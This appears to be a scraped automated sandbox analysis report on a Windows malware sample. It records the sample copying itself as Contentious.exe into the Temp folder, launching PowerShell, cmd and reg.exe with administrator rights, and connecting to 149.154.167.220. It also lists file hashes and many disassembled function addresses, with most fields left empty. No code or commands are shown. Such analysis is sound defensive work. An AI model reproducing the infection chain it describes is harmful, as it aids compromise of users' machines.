2024-07-25 07:57:01 UTC | 710 | IN | |
2024-07-25 07:57:01 UTC | 340 | IN | |
2024-07-25 07:57:01 UTC | 5 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
9 | 192.168.2.4 | 49753 | 149.154.167.220 | 443 | 7972 | C:\Users\user\AppData\Local\Temp\Contentious.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2024-07-25 07:57:07 UTC | 350 | OUT | |
2024-07-25 07:57:07 UTC | 547 | OUT | |
2024-07-25 07:57:07 UTC | 388 | IN | |
2024-07-25 07:57:07 UTC | 537 | IN |
Click to jump to process
Click to jump to process
back
Click to dive into process behavior distribution
Click to jump to process
Target ID: | 0 |
Start time: | 03:55:52 |
Start date: | 25/07/2024 |
Path: | C:\Users\user\Desktop\Torpernes.exe |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0x400000 |
File size: | 1'283'968 bytes |
MD5 hash: | ECC4FF0EE7D123F0E90587EA3A7B9AE3 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | low |
Has exited: | true |
Target ID: | 1 |
Start time: | 03:55:54 |
Start date: | 25/07/2024 |
Path: | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0xc90000 |
File size: | 433'152 bytes |
MD5 hash: | C32CA4ACFCC635EC1EA6ED8A34DF5FAC |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Yara matches: |
|
Reputation: | high |
Has exited: | true |
Target ID: | 2 |
Start time: | 03:55:54 |
Start date: | 25/07/2024 |
Path: | C:\Windows\System32\conhost.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff7699e0000 |
File size: | 862'208 bytes |
MD5 hash: | 0D698AF330FD17BEE3BF90011D49251D |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 6 |
Start time: | 03:56:31 |
Start date: | 25/07/2024 |
Path: | C:\Users\user\AppData\Local\Temp\Contentious.exe |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0x400000 |
File size: | 1'283'968 bytes |
MD5 hash: | ECC4FF0EE7D123F0E90587EA3A7B9AE3 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Yara matches: |
|
Antivirus matches: |
|
Reputation: | low |
Has exited: | false |
Target ID: | 7 |
Start time: | 03:56:35 |
Start date: | 25/07/2024 |
Path: | C:\Windows\SysWOW64\cmd.exe |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0x240000 |
File size: | 236'544 bytes |
MD5 hash: | D0FCE3AFA6AA1D58CE9FA336CC2B675B |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 8 |
Start time: | 03:56:35 |
Start date: | 25/07/2024 |
Path: | C:\Windows\System32\conhost.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff7699e0000 |
File size: | 862'208 bytes |
MD5 hash: | 0D698AF330FD17BEE3BF90011D49251D |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 9 |
Start time: | 03:56:35 |
Start date: | 25/07/2024 |
Path: | C:\Windows\SysWOW64\reg.exe |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0xce0000 |
File size: | 59'392 bytes |
MD5 hash: | CDD462E86EC0F20DE2A1D781928B1B0C |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Execution Graph
Execution Coverage: | 20.1% |
Dynamic/Decrypted Code Coverage: | 0% |
Signature Coverage: | 22.5% |
Total number of Nodes: | 1256 |
Total number of Limit Nodes: | 36 |
Graph
Function 004031FF Relevance: 77.4, APIs: 27, Strings: 17, Instructions: 383stringfilecomCOMMON
Control-flow Graph
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00405200 Relevance: 65.0, APIs: 36, Strings: 1, Instructions: 284windowclipboardmemoryCOMMON
Control-flow Graph
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00405E3B Relevance: 23.0, APIs: 8, Strings: 5, Instructions: 207stringCOMMON
Control-flow Graph
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 004056A1 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 148filestringCOMMON
Control-flow Graph
APIs |
|
Strings |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0040646E Relevance: 5.4, APIs: 4, Instructions: 382COMMON
Control-flow Graph
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0040615C Relevance: 3.0, APIs: 2, Instructions: 14fileCOMMON
APIs |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 004037AC Relevance: 49.2, APIs: 15, Strings: 13, Instructions: 216stringregistrylibraryCOMMON
Control-flow Graph
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Control-flow Graph
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Control-flow Graph
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00402FA2 Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 166fileCOMMON
Control-flow Graph
APIs |
Strings |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00401752 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 145stringtimeCOMMON
Control-flow Graph
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 004050C1 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 72stringwindowCOMMON
Control-flow Graph
APIs |
|
Strings |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Control-flow Graph
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Control-flow Graph
APIs |
Strings |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Control-flow Graph
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Control-flow Graph
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00405590 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON
APIs |
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
|
Strings |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 004068A3 Relevance: 5.2, APIs: 4, Instructions: 236COMMON
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00406AA4 Relevance: 5.2, APIs: 4, Instructions: 208COMMON
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 004067BA Relevance: 5.2, APIs: 4, Instructions: 205COMMON
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 004062BF Relevance: 5.2, APIs: 4, Instructions: 198COMMON
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0040670D Relevance: 5.2, APIs: 4, Instructions: 180COMMON
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0040682B Relevance: 5.2, APIs: 4, Instructions: 170COMMON
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00406777 Relevance: 5.2, APIs: 4, Instructions: 168COMMON
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00401389 Relevance: 3.0, APIs: 2, Instructions: 43windowCOMMON
APIs |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00401DC7 Relevance: 3.0, APIs: 2, Instructions: 21COMMON
APIs |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00405A85 Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON
APIs |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00405A60 Relevance: 3.0, APIs: 2, Instructions: 13COMMON
APIs |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00401718 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00405B08 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0040159B Relevance: 1.5, APIs: 1, Instructions: 18COMMON
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00404073 Relevance: 1.5, APIs: 1, Instructions: 9windowCOMMON
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0040405C Relevance: 1.5, APIs: 1, Instructions: 6windowCOMMON
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 004031B4 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00404049 Relevance: 1.5, APIs: 1, Instructions: 4COMMON
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00404A3D Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 481windowmemoryCOMMON
APIs |
|
Strings |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 004044C2 Relevance: 24.8, APIs: 10, Strings: 4, Instructions: 275stringCOMMON
APIs |
|
Strings |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00402770 Relevance: 1.5, APIs: 1, Instructions: 30fileCOMMON
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 004041C4 Relevance: 40.5, APIs: 20, Strings: 3, Instructions: 207windowstringCOMMON
APIs |
|
Strings |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00405B37 Relevance: 29.9, APIs: 12, Strings: 5, Instructions: 136stringmemoryfileCOMMON
APIs |
|
Strings |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
|
Strings |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0040408E Relevance: 12.1, APIs: 8, Instructions: 61COMMON
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 004024EE Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 54filestringCOMMON
APIs |
Strings |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0040498B Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON
APIs |
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00402C7F Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40timeCOMMON
APIs |
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00401CE5 Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON
APIs |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0040487D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84stringCOMMON
APIs |
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00401BCA Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 76windowtimeCOMMON
APIs |
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00405CE6 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 45registryCOMMON
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00405864 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00401F08 Relevance: 6.1, APIs: 4, Instructions: 55memoryCOMMON
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00402D05 Relevance: 6.0, APIs: 4, Instructions: 33COMMON
APIs |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00405035 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON
APIs |
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 004058B0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16stringCOMMON
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 004059EA Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0457EAD8 Relevance: .3, Instructions: 281COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0457F3A8 Relevance: .3, Instructions: 266COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 070A48D0 Relevance: 31.1, Strings: 24, Instructions: 1118COMMON
Strings |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 070A70A5 Relevance: 12.9, Strings: 10, Instructions: 400COMMON
Strings |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 070ABCFF Relevance: 12.2, Strings: 9, Instructions: 994COMMON
Strings |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 070AFB6B Relevance: 9.1, Strings: 7, Instructions: 318COMMON
Strings |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 070A3178 Relevance: 7.9, Strings: 6, Instructions: 373COMMON
Strings |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 070A0778 Relevance: 6.5, Strings: 5, Instructions: 230COMMON
Strings |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 070A386D Relevance: 5.7, Strings: 4, Instructions: 660COMMON
Strings |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 070A9110 Relevance: 5.6, Strings: 4, Instructions: 588COMMON
Strings |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 070A3176 Relevance: 5.3, Strings: 4, Instructions: 290COMMON
Strings |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 070A4262 Relevance: 4.4, Strings: 3, Instructions: 644COMMON
Strings |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 070A37CE Relevance: 4.4, Strings: 3, Instructions: 631COMMON
Strings |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 070AC54B Relevance: 4.4, Strings: 3, Instructions: 621COMMON
Strings |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0457AFE8 Relevance: 4.3, Strings: 3, Instructions: 521COMMON
Strings |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 070AC632 Relevance: 4.2, Strings: 3, Instructions: 468COMMON
Strings |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 070AC6D1 Relevance: 4.2, Strings: 3, Instructions: 425COMMON
Strings |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 070AC6BB Relevance: 4.1, Strings: 3, Instructions: 331COMMON
Strings |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 070A1040 Relevance: 3.0, Strings: 2, Instructions: 493COMMON
Strings |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 070A3618 Relevance: 1.4, Strings: 1, Instructions: 102COMMON
Strings |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 045795A8 Relevance: .3, Instructions: 327COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 045772A0 Relevance: .3, Instructions: 317COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0457EACD Relevance: .3, Instructions: 280COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0457F39C Relevance: .3, Instructions: 264COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 070A5A88 Relevance: .2, Instructions: 239COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 04577A68 Relevance: .2, Instructions: 196COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 070A4610 Relevance: .2, Instructions: 192COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 04577BD6 Relevance: .2, Instructions: 188COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 070A460A Relevance: .2, Instructions: 176COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 045777F9 Relevance: .1, Instructions: 127COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 070A90F5 Relevance: .1, Instructions: 123COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 04577A53 Relevance: .1, Instructions: 120COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 04572BB0 Relevance: .1, Instructions: 110COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 070A0DE8 Relevance: .1, Instructions: 94COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0457BCA0 Relevance: .1, Instructions: 92COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 070A5A69 Relevance: .1, Instructions: 87COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 070A5A30 Relevance: .1, Instructions: 84COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 070A0DCD Relevance: .1, Instructions: 79COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 070A5A49 Relevance: .1, Instructions: 74COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 04579597 Relevance: .1, Instructions: 64COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 070A0BD8 Relevance: .1, Instructions: 52COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 070A17F7 Relevance: .0, Instructions: 6COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 070A8778 Relevance: 14.2, Strings: 11, Instructions: 496COMMON
Strings |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 070AD0B8 Relevance: 14.1, Strings: 11, Instructions: 367COMMON
Strings |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 070A7738 Relevance: 11.7, Strings: 9, Instructions: 419COMMON
Strings |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 070AE1D4 Relevance: 8.9, Strings: 7, Instructions: 160COMMON
Strings |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 070ADC79 Relevance: 7.7, Strings: 6, Instructions: 168COMMON
Strings |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 070A0285 Relevance: 7.6, Strings: 6, Instructions: 79COMMON
Strings |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 070AEBDC Relevance: 6.4, Strings: 5, Instructions: 194COMMON
Strings |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 070AEBF0 Relevance: 6.4, Strings: 5, Instructions: 185COMMON
Strings |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 070A0470 Relevance: 6.4, Strings: 5, Instructions: 148COMMON
Strings |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 070ADDBE Relevance: 6.3, Strings: 5, Instructions: 85COMMON
Strings |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 070AA470 Relevance: 6.3, Strings: 5, Instructions: 71COMMON
Strings |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 070AD588 Relevance: 5.5, Strings: 4, Instructions: 482COMMON
Strings |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 070AEFB8 Relevance: 5.1, Strings: 4, Instructions: 115COMMON
Strings |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 070AA800 Relevance: 5.1, Strings: 4, Instructions: 94COMMON
Strings |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 070A771D Relevance: 5.1, Strings: 4, Instructions: 82COMMON
Strings |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 070AA7E1 Relevance: 5.1, Strings: 4, Instructions: 80COMMON
Strings |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Execution Graph
Execution Coverage: | 14.1% |
Dynamic/Decrypted Code Coverage: | 100% |
Signature Coverage: | 7.6% |
Total number of Nodes: | 92 |
Total number of Limit Nodes: | 6 |
Graph
Function 00156730 Relevance: 6.7, Strings: 5, Instructions: 467COMMON
Control-flow Graph
Strings |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 20CB3288 Relevance: 4.3, Strings: 1, Instructions: 3069COMMON
Strings |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00159858 Relevance: 3.4, Strings: 2, Instructions: 860COMMON
Strings |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00156108 Relevance: 3.0, Strings: 2, Instructions: 513COMMON
Strings |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0015B328 Relevance: 2.9, Strings: 2, Instructions: 356COMMON
Control-flow Graph
Strings |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0015BBBA Relevance: 2.7, Strings: 2, Instructions: 202COMMON
Strings |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0015C754 Relevance: 2.7, Strings: 2, Instructions: 192COMMON
Strings |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00154AD9 Relevance: 2.7, Strings: 2, Instructions: 188COMMON
Strings |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0015C473 Relevance: 2.7, Strings: 2, Instructions: 186COMMON
Strings |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0015CA34 Relevance: 2.7, Strings: 2, Instructions: 186COMMON
Strings |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0015C190 Relevance: 2.7, Strings: 2, Instructions: 185COMMON
Strings |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0015BEB7 Relevance: 2.7, Strings: 2, Instructions: 181COMMON
Strings |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 20CB7588 Relevance: .5, Instructions: 531COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 238285B0 Relevance: .3, Instructions: 296COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0015F778 Relevance: .3, Instructions: 292COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 20CB0D60 Relevance: .3, Instructions: 268COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 23820498 Relevance: .3, Instructions: 268COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 20CB11B0 Relevance: .2, Instructions: 222COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 20CB11C0 Relevance: .2, Instructions: 220COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 20CB1506 Relevance: .2, Instructions: 202COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 20CB0D50 Relevance: .1, Instructions: 102COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 20424F6F Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 128threadCOMMON
Control-flow Graph
APIs |
Strings |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 20424F70 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 128threadCOMMON
Control-flow Graph
APIs |
Strings |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00156E58 Relevance: 10.5, Strings: 8, Instructions: 475COMMON
Control-flow Graph
Strings |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 20CB1CB0 Relevance: 5.2, Strings: 4, Instructions: 229COMMON
Control-flow Graph
Strings |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 001587E9 Relevance: 4.3, Strings: 3, Instructions: 503COMMON
Control-flow Graph
Strings |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 001577F0 Relevance: 3.2, Strings: 2, Instructions: 702COMMON
Control-flow Graph
Strings |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 001556A8 Relevance: 2.8, Strings: 2, Instructions: 326COMMON
Control-flow Graph
Strings |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00155C08 Relevance: 2.7, Strings: 2, Instructions: 232COMMON
Control-flow Graph
Strings |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 20CB24D8 Relevance: 2.7, Strings: 2, Instructions: 167COMMON
Strings |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00153428 Relevance: 2.6, Strings: 2, Instructions: 112COMMON
Strings |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 20CB25B1 Relevance: 2.6, Strings: 2, Instructions: 101COMMON
Strings |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 20CB25E5 Relevance: 2.6, Strings: 2, Instructions: 100COMMON
Strings |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00150C8F Relevance: 1.7, Strings: 1, Instructions: 406COMMON
Strings |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00150CA0 Relevance: 1.6, Strings: 1, Instructions: 395COMMON
Strings |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 2042FA50 Relevance: 1.6, APIs: 1, Instructions: 113COMMON
APIs |
|
Memory Dump Source |
|
